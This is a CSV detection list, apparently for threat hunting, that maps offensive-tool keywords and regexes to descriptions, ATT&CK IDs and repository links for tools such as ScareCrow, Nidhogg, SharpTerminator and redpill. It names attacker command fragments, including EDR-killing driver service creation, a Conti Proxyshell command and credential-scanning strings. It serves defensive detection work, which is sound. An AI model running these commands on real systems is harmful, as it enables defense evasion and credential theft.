"*SAP_GW_RCE_exploit*",".{0,1000}SAP_GW_RCE_exploit.{0,1000}","offensive_tool_keyword","SAP_GW_RCE_exploit","This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!) SAPanonGWv2.py is the second version of the exploit based on the pysap library","T1078 - T1046 - T1201 - T1021","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chipik/SAP_GW_RCE_exploit","1","0","N/A","N/A","2","151","52","2020-09-07T13:46:04Z","2019-03-14T13:52:00Z" "*sap2john.pl*",".{0,1000}sap2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*SauronEye.exe*",".{0,1000}SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sc create plumber*warpzoneclient*",".{0,1000}sc\screate\splumber.{0,1000}warpzoneclient.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*sc create Terminator *.sys*",".{0,1000}sc\screate\sTerminator\s.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*sc delete plumber*",".{0,1000}sc\sdelete\splumber.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*sc -path c:\inetpub\wwwroot\aspnet_client\test.txt -value teset*",".{0,1000}sc\s\-path\sc\:\\inetpub\\wwwroot\\aspnet_client\\test\.txt\s\-value\steset.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #7","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sc start nidhogg*",".{0,1000}sc\sstart\snidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*sc_inject_direct.exe*",".{0,1000}sc_inject_direct\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*sc_inject_indirect.exe*",".{0,1000}sc_inject_indirect\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*sc0tfree*",".{0,1000}sc0tfree.{0,1000}","offensive_tool_keyword","Github Username","github username - Pentester. Red teamer. OSCP. Former wardialer and OKI 900 enthusiast. Senior Security Consultant @ctxis hosting offensve tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sc0tfree","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*scada_default_userpass.txt*",".{0,1000}scada_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*scan -T list_of_targets.txt*",".{0,1000}scan\s\-T\slist_of_targets\.txt.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*scan4all -*",".{0,1000}scan4all\s\-.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all -*.xml*",".{0,1000}scan4all\s\-.{0,1000}\.xml.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all -h*",".{0,1000}scan4all\s\-h.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all -tp *",".{0,1000}scan4all\s\-tp\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all.51pwn.com*",".{0,1000}scan4all\.51pwn\.com.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all.51pwn.com/*",".{0,1000}scan4all\.51pwn\.com\/.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*.*_linux_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*.*_macOS_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_macOS_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*.*_macOS_arm64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_macOS_arm64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*.*_windows_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_windows_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*_linux_amd64.zip*",".{0,1000}scan4all_.{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*_windows_amd64.zip*",".{0,1000}scan4all_.{0,1000}_windows_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_windows_386.exe*",".{0,1000}scan4all_windows_386\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_windows_amd64.exe*",".{0,1000}scan4all_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all-main*",".{0,1000}scan4all\-main.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*ScanInterception_x64.ps1*",".{0,1000}ScanInterception_x64\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*scanless*",".{0,1000}scanless.{0,1000}","offensive_tool_keyword","scanless","This is a Python 3 command-line utility and library for using websites that can perform port scans on your behalf","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0008","N/A","N/A","Information Gathering","https://github.com/vesche/scanless","1","0","N/A","N/A","10","1100","169","2023-08-07T15:12:42Z","2017-05-05T02:53:01Z" "*scanner/backdoor*",".{0,1000}scanner\/backdoor.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*scannerport.go -*",".{0,1000}scannerport\.go\s\-.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","79","20","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*Scanners-Box*",".{0,1000}Scanners\-Box.{0,1000}","offensive_tool_keyword","Scanners-Box","Scanners Box also known as scanbox. is a powerful hacker toolkit. which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. aircrack-ng will not be included in the scope of collection.","T1190 - T1210.001 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/We5ter/Scanners-Box","1","0","N/A","N/A","10","7986","2348","2024-04-19T05:43:34Z","2016-12-24T16:07:50Z" "*Scanning ConsoleHost_History for creds*",".{0,1000}Scanning\sConsoleHost_History\sfor\screds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Scanning credential store for creds!*",".{0,1000}Scanning\scredential\sstore\sfor\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Scanning for Sandboxie?*",".{0,1000}Scanning\sfor\sSandboxie\?.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*Scanning registry for winlogon creds*",".{0,1000}Scanning\sregistry\sfor\swinlogon\screds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Scanning Teamviewer for creds!*",".{0,1000}Scanning\sTeamviewer\sfor\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Scanning winlogon for crypted creds!*",".{0,1000}Scanning\swinlogon\sfor\scrypted\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*ScanProcessForBadgerConfig*",".{0,1000}ScanProcessForBadgerConfig.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ScanTCPImplant*",".{0,1000}ScanTCPImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*ScareCrow *-loader *",".{0,1000}ScareCrow\s.{0,1000}\-loader\s.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -encryptionmode *",".{0,1000}ScareCrow.{0,1000}\s\-encryptionmode\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -Evasion*",".{0,1000}ScareCrow.{0,1000}\s\-Evasion.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -Exec*",".{0,1000}ScareCrow.{0,1000}\s\-Exec.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -injection*",".{0,1000}ScareCrow.{0,1000}\s\-injection.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 